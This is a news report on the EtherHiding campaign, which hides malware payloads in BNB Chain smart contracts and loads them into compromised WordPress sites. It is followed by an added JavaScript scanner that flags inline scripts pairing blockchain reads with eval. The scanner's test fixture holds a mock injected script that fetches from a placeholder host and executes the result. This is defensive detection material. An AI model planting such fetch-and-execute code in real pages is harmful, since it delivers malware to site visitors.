
EtherHiding: A New Approach to Hiding Malicious Code in Blockchain


Cybercriminals have devised a cunning way to spread malware, using BNB Chain (BSC) smart contracts to hide malware and distribute malicious code, tricking unsuspecting users.

Security researchers at Guardio Labs unveiled the technique, known as EtherHiding, in a report on October 15.


The attack is carried out by compromising WordPress websites and injecting code that retrieves partial payloads from blockchain contracts. These payloads are hidden in BSC smart contracts, which act as anonymous hosting platforms for malicious code.

One of the distinguishing features of this technique is the ability of hackers to update the code and change their attack methods at will. Recent attacks have taken the form of fake browser updates, where victims receive prompts to update their browsers via fake landing pages and links.

The payload contains JavaScript code which retrieves additional code from the attackers’ domains and eventually leads to complete website destruction, with fake browser update notifications that distribute the malware.

The flexibility of this attack chain allows threat actors to easily replace malicious code with each new blockchain transaction, making mitigation efforts challenging, as highlighted by Nati Tal, head of cybersecurity at Guardio Labs, and fellow security researcher Oleg Zaitsev.

When these infected smart contracts are deployed, they operate independently, and Binance relies on its developer community to flag malicious code in contracts. Guardio emphasized the vulnerability of WordPress websites, which power about 43% of all websites, and urged site owners to increase their security measures. It emphasized that these sites often act as the main gateways for threats to a large number of potential victims.
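For site owners, one way to check rendered pages for the injection pattern described above (inline code that reads from a blockchain contract and then executes what it retrieves). This is an added example, not code from Guardio Labs or the original article; the indicator patterns, sample pages and function names are assumptions.

```javascript
// Added example. The indicator patterns are assumptions, not values from the article.
const CHAIN_READ = [
  /\beth_call\b/,                     // standard Ethereum-style JSON-RPC read method
  /JsonRpcProvider|Web3\.providers/,  // entry points of common web3 client libraries
  /\b0x[0-9a-fA-F]{40}\b/,            // 20-byte contract address literal
];
const DYNAMIC_EXEC = [/\beval\s*\(/, /\bnew\s+Function\s*\(/];

// Return the bodies of inline <script> elements (external src scripts are skipped).
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1]) && m[2].trim()) out.push(m[2]);
  }
  return out;
}

// Flag inline scripts that both read from a chain and execute a string as code.
// Either signal alone is common on legitimate sites, so only the pair is reported.
function scanPage(html) {
  const findings = [];
  extractInlineScripts(html).forEach((code, index) => {
    const chain = CHAIN_READ.filter((p) => p.test(code)).map(String);
    const exec = DYNAMIC_EXEC.filter((p) => p.test(code)).map(String);
    if (chain.length > 0 && exec.length > 0) findings.push({ index, chain, exec });
  });
  return findings;
}

// Constructed samples; the second is inert (placeholder host, undefined helpers).
const CLEAN_PAGE = `<html><head><script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>window.siteConfig = { theme: "dark" };</script></head><body></body></html>`;
const INJECTED_PAGE = `<html><head><script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>var req = { method: "eth_call",
  params: [{ to: "0x0000000000000000000000000000000000000000" }] };
send("https://rpc.example.invalid", req, function (r) { eval(decode(r)); });</script>
</head><body></body></html>`;

console.log(JSON.stringify(scanPage(CLEAN_PAGE)));
console.log(JSON.stringify(scanPage(INJECTED_PAGE)));
```

A hit is a lead for manual review of the theme or plugin file that emitted the script, not proof of compromise.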

The company also concluded that the emergence of Web3 and blockchain technology opens up new ways for malicious campaigns to operate unchecked, and emphasized the need for adaptive defenses to combat these emerging threats.
